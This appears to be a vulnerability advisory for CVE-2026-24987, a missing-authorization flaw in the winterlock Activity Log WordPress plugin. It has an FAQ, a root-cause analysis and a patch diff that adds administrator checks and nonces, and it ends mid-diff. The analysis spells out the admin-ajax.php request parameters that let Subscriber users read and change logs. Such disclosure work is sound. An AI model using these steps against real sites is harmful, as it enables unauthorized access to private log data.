What is CVE-2026-24987?

CVE-2026-24987 is a medium severity vulnerability in the Activity Log for WordPress plugin, affecting versions up to and including 1.2.7. It is caused by a missing authorization check, allowing authenticated users with Subscriber-level access to perform unauthorized actions.

How does the vulnerability work?

The vulnerability allows authenticated attackers to send requests to specific AJAX endpoints without proper capability checks. By using a valid WordPress authentication cookie, attackers can access sensitive activity log data and perform administrative functions that should be restricted.

Who is affected by this vulnerability?

Any WordPress site using the Activity Log for WordPress plugin version 1.2.7 or earlier is affected. This includes sites where users have Subscriber-level permissions or higher, as they can exploit the vulnerability to gain unauthorized access.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Activity Log for WordPress plugin installed on your site. If it is version 1.2.7 or earlier, your site is susceptible to this vulnerability.

How can I fix this vulnerability?

The vulnerability has been patched in version 1.2.8 of the Activity Log for WordPress plugin. Update your plugin to the latest version to ensure that the missing authorization checks and nonce verifications are in place.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant immediate attention and remediation to prevent potential exploitation.

What are the risks of not addressing this vulnerability?

Failing to address this vulnerability could allow unauthorized users to access sensitive activity logs, manipulate filters, and export data. This could lead to privilege escalation and exposure of confidential information about site operations and user behavior.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a POST request to the admin-ajax.php endpoint with specific parameters. This allows access to the datatable function without proper authorization, highlighting the severity of the issue.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Activity Log for WordPress plugin until you can apply the patch. Additionally, review user permissions and limit access to authenticated users with higher privileges.

How does nonce verification enhance security?

Nonce verification helps protect against Cross-Site Request Forgery (CSRF) attacks by ensuring that the request is coming from a legitimate source. It adds an additional layer of security, making it harder for attackers to exploit vulnerable endpoints.

What are AJAX endpoints in WordPress?

AJAX endpoints in WordPress allow asynchronous requests to be made to the server without reloading the page. They are commonly used for dynamic content updates and can be vulnerable if not properly secured, as seen in this vulnerability.

How can I stay informed about future vulnerabilities?

Stay informed by subscribing to security advisories from WordPress, following security blogs, and monitoring CVE databases. Regularly check for updates to plugins and themes, and consider using security plugins that provide vulnerability alerts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-24987: Activity Log for WordPress <= 1.2.7 – Missing Authorization (winterlock)

CVE ID CVE-2026-24987

Plugin winterlock

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.2.7

Patched Version 1.2.8

Disclosed March 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24987:
The Activity Log for WordPress plugin, versions up to and including 1.2.7, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to perform administrative actions. The vulnerability affects multiple AJAX endpoints within the plugin’s controller classes.

Atomic Edge research identifies the root cause as the absence of capability checks and nonce verification in several public datatable() and filter-related functions. The vulnerable functions are located in the plugin’s controller files within the winterlock/application/controllers/ directory. Specifically, the datatable() functions in Wal_cloudintegration.php (line 277), Wal_controlsecurity.php (line 17), Wal_disabledlogs.php (line 17), Wal_history.php (line 71), Wal_logalerts.php (line 17), Wal_reports.php (line 129), Wal_usersessions.php (line 27), and Winteractivitylog.php (line 79) lacked authorization controls. The filter_save(), filter_get(), and filter_remove() functions in Wal_history.php and Winteractivitylog.php were also affected.

Exploitation occurs via WordPress’s admin-ajax.php endpoint. An attacker with a valid WordPress authentication cookie sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to winter_activity_log_action. The request includes additional parameters: page specifying the controller (e.g., wal_history) and function specifying the vulnerable method (e.g., datatable). The attacker can access log data, manage filters, and perform other administrative operations without proper permissions.

The patch adds two security controls to each vulnerable function. First, it implements a capability check using if ( ! current_user_can( ‘administrator’ ) ) { exit(); } to restrict access to administrators only. Second, it adds a nonce verification with check_ajax_referer(‘winterlock_secure_ajax’, ‘winterlock_secure’) to prevent CSRF attacks. The patch also updates corresponding view files to include the nonce in AJAX requests, as seen in the JavaScript modifications across multiple index.php files.

Successful exploitation grants Subscriber-level users unauthorized access to sensitive activity log data, including user sessions, security controls, reports, and cloud integration settings. Attackers can view, filter, save, and remove log entries. They can also manipulate alert configurations and export sensitive data. This vulnerability enables privilege escalation within the plugin’s context, potentially exposing internal system information and user behavior analytics.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/winterlock/application/controllers/Wal_cloudintegration.php
+++ b/winterlock/application/controllers/Wal_cloudintegration.php
@@ -277,6 +277,14 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_controlsecurity.php
+++ b/winterlock/application/controllers/Wal_controlsecurity.php
@@ -17,6 +17,12 @@
 	// json for datatables
 	public function datatable()
 	{
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_disabledlogs.php
+++ b/winterlock/application/controllers/Wal_disabledlogs.php
@@ -17,6 +17,12 @@
 	// json for datatables
 	public function datatable()
 	{
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_history.php
+++ b/winterlock/application/controllers/Wal_history.php
@@ -71,6 +71,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

@@ -244,6 +251,12 @@
     }

     public function filter_save ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -291,6 +304,12 @@


     public function filter_get ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -328,6 +347,12 @@
     }

     public function filter_remove ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -351,7 +376,7 @@
             update_option($name_val, $options);
         }

-        $ajax_output['results'] = $results;
+        $ajax_output['results'] = $results ?? '';
         $ajax_output['success'] = true;
         $json_output = json_encode($ajax_output);
         //$length = mb_strlen($json_output);
--- a/winterlock/application/controllers/Wal_logalerts.php
+++ b/winterlock/application/controllers/Wal_logalerts.php
@@ -17,6 +17,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_reports.php
+++ b/winterlock/application/controllers/Wal_reports.php
@@ -129,6 +129,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_usersessions.php
+++ b/winterlock/application/controllers/Wal_usersessions.php
@@ -27,6 +27,13 @@
     */
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Winteractivitylog.php
+++ b/winterlock/application/controllers/Winteractivitylog.php
@@ -79,6 +79,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

@@ -249,6 +256,11 @@
     }

     public function filter_save ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -296,6 +308,12 @@


     public function filter_get ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -333,6 +351,12 @@
     }

     public function filter_remove ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
--- a/winterlock/application/views/wal_cloudintegration/index.php
+++ b/winterlock/application/views/wal_cloudintegration/index.php
@@ -17,9 +17,19 @@

 <div class="wrap winterlock_wrap">

-<h1><?php echo __('Cloud integration', 'winter-activity-log'); ?>
-<a href="<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=cloud_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New Papertrail Cloud','sw_win')?></a>
-<a href="<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=mysql_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New External MySQL Connection','sw_win')?></a>
+<h1><?php
+echo __( 'Cloud integration', 'winter-activity-log' );
+?>
+<a href="<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=cloud_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New Papertrail Cloud', 'sw_win' );
+?></a>
+<a href="<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=mysql_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New External MySQL Connection', 'sw_win' );
+?></a>

 </h1>

@@ -27,7 +37,9 @@
 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading">
-            <h3 class="panel-title"><?php echo __('Manage Cloud integration Data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Manage Cloud integration Data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">

@@ -38,9 +50,15 @@
                         <thead>
                             <tr>
                                 <th data-priority="1">#</th>
-                                <th data-priority="2"><?php echo __('Title', 'winter-activity-log'); ?></th>
-                                <th data-priority="3"><?php echo __('Component', 'winter-activity-log'); ?></th>
-                                <th data-priority="4"><?php echo __('Program name', 'winter-activity-log'); ?></th>
+                                <th data-priority="2"><?php
+echo __( 'Title', 'winter-activity-log' );
+?></th>
+                                <th data-priority="3"><?php
+echo __( 'Component', 'winter-activity-log' );
+?></th>
+                                <th data-priority="4"><?php
+echo __( 'Program name', 'winter-activity-log' );
+?></th>
                                 <th data-priority="5"><i class="glyphicon glyphicon-edit"></i></th>
                                 <th><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -62,37 +80,42 @@
                 </div>
             </div>
             <div class="footer-btns">
-                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
             </div>
         </div>
     </div>

-    <div class="alert alert-info" role="alert"><?php echo __('Here you can configure cloud loging to Papertrail app', 'winter-activity-log'); ?></div>
+    <div class="alert alert-info" role="alert"><?php
+echo __( 'Here you can configure cloud loging to Papertrail app', 'winter-activity-log' );
+?></div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('premium') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. premium package is required for cloud integration', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>

     <iframe width="560" height="315" src="https://www.youtube.com/embed/4QvmA3HkdDY" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

-    <?php endif; ?>
+    <?php
+}
+?>
 </div>
 </div>



-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>
 <script>
@@ -120,14 +143,18 @@
         load_indicator_opc.removeClass('hidden_opacity');
         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select reports to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select reports to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();

@@ -135,7 +162,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idcloud' ).toArray();

                 // ajax to remove rows
-                $.post('<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { cloud_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { cloud_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

@@ -169,18 +200,27 @@
                     return $.extend( {}, d, {
                         "page": 'wal_cloudintegration',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                     } );
                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "fnDrawCallback": function (oSettings){
                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
@@ -274,11 +314,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
--- a/winterlock/application/views/wal_controlsecurity/index.php
+++ b/winterlock/application/views/wal_controlsecurity/index.php
@@ -176,7 +176,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_controlsecurity',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_disabledlogs/index.php
+++ b/winterlock/application/views/wal_disabledlogs/index.php
@@ -170,7 +170,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_disabledlogs',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_history/index.php
+++ b/winterlock/application/views/wal_history/index.php
@@ -241,6 +241,7 @@
             "page": 'wal_history',
             'function': 'filter_get',
             "action": 'winter_activity_log_action',
+            "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
         };

         $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
@@ -294,6 +295,7 @@
                     'function': 'filter_remove',
                     "action": 'winter_activity_log_action',
                     "filter_id": $(this).attr('data-fielderid') || '',
+                    "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                 };
                 sw_log_notify('<?php echo __('Removing filter', 'winter-activity-log'); ?> '+title, 'loading');

@@ -349,7 +351,8 @@
                             'function': 'filter_save',
                             "action": 'winter_activity_log_action',
                             "filter_name": filter_name,
-                            "filter_param": generate_json_filter()
+                            "filter_param": generate_json_filter(),
+                             "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                         };

                         $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
@@ -480,7 +483,8 @@
                 return $.extend( {}, d, {
                     "page": 'wal_history',
                     "function": 'datatable',
-                    "action": 'winter_activity_log_action'
+                    "action": 'winter_activity_log_action',
+                    "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                 } );


--- a/winterlock/application/views/wal_logalerts/index.php
+++ b/winterlock/application/views/wal_logalerts/index.php
@@ -170,7 +170,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_logalerts',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_reports/index.php
+++ b/winterlock/application/views/wal_reports/index.php
@@ -17,13 +17,21 @@

 <div class="wrap winterlock_wrap">

-<h1><?php echo __('Reports','winter-activity-log'); ?> <a href="<?php menu_page_url( 'wal_reports', true ); ?>&function=report_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New','sw_win')?></a></h1>
+<h1><?php
+echo __( 'Reports', 'winter-activity-log' );
+?> <a href="<?php
+menu_page_url( 'wal_reports', true );
+?>&function=report_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New', 'sw_win' );
+?></a></h1>


 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading">
-            <h3 class="panel-title"><?php echo __('Manage Reports Data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Manage Reports Data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">

@@ -34,10 +42,18 @@
                         <thead>
                             <tr>
                                 <th data-priority="1">#</th>
-                                <th data-priority="2"><?php echo __('Name', 'winter-activity-log'); ?></th>
-                                <th data-priority="3"><?php echo __('Email', 'winter-activity-log'); ?></th>
-                                <th data-priority="4"><?php echo __('Scheduling period', 'winter-activity-log'); ?></th>
-                                <th data-priority="5"><?php echo __('Format', 'winter-activity-log'); ?></th>
+                                <th data-priority="2"><?php
+echo __( 'Name', 'winter-activity-log' );
+?></th>
+                                <th data-priority="3"><?php
+echo __( 'Email', 'winter-activity-log' );
+?></th>
+                                <th data-priority="4"><?php
+echo __( 'Scheduling period', 'winter-activity-log' );
+?></th>
+                                <th data-priority="5"><?php
+echo __( 'Format', 'winter-activity-log' );
+?></th>
                                 <th data-priority="6"><i class="glyphicon glyphicon-search"></i></th>
                                 <th><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -60,38 +76,43 @@
                 </div>
             </div>
             <div class="footer-btns">
-                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
             </div>
         </div>
     </div>

-    <div class="alert alert-info" role="alert"><?php echo __('Here you can define regular or scheduling reports', 'winter-activity-log'); ?></div>
+    <div class="alert alert-info" role="alert"><?php
+echo __( 'Here you can define regular or scheduling reports', 'winter-activity-log' );
+?></div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('standard') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. standard package is required for log repors', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>

     <iframe width="560" height="315" src="https://www.youtube.com/embed/YF2VesF1NC8" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

-    <?php endif; ?>
+    <?php
+}
+?>

 </div>
 </div>



-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>
 <script>
@@ -119,14 +140,18 @@
         load_indicator_opc.removeClass('hidden_opacity');
         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select reports to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select reports to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();

@@ -134,7 +159,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idreport' ).toArray();

                 // ajax to remove rows
-                $.post('<?php menu_page_url( 'wal_reports', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { report_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'wal_reports', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { report_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

@@ -168,18 +197,27 @@
                     return $.extend( {}, d, {
                         "page": 'wal_reports',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                     } );
                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "fnDrawCallback": function (oSettings){
                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
@@ -278,11 +316,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
--- a/winterlock/application/views/wal_usersessions/index.php
+++ b/winterlock/application/views/wal_usersessions/index.php
@@ -168,7 +168,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_usersessions',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/winteractivitylog/index.php
+++ b/winterlock/application/views/winteractivitylog/index.php
@@ -13,7 +13,7 @@
  */
 ?>

-<?php
+<?php
 $def_col_level = 0;
 $def_col_date = 0;
 $def_col_avatar = 0;
@@ -21,19 +21,28 @@
 $def_col_ip = 0;
 $def_col_description = 0;
 $def_col_select = 1;
-$def_cols = ['level','date','avatar','user','ip','description'];
-foreach ($def_cols as $def_column){
-    if(sw_wal_log_is_visible_table_column($def_column)){
+$def_cols = [
+    'level',
+    'date',
+    'avatar',
+    'user',
+    'ip',
+    'description'
+];
+foreach ( $def_cols as $def_column ) {
+    if ( sw_wal_log_is_visible_table_column( $def_column ) ) {
         $s_plus = false;
-        foreach ($def_cols as $col) {
-            if($col == $def_column) $s_plus = true;
-            if($s_plus)
-                ${'def_col_'.$col}++;
+        foreach ( $def_cols as $col ) {
+            if ( $col == $def_column ) {
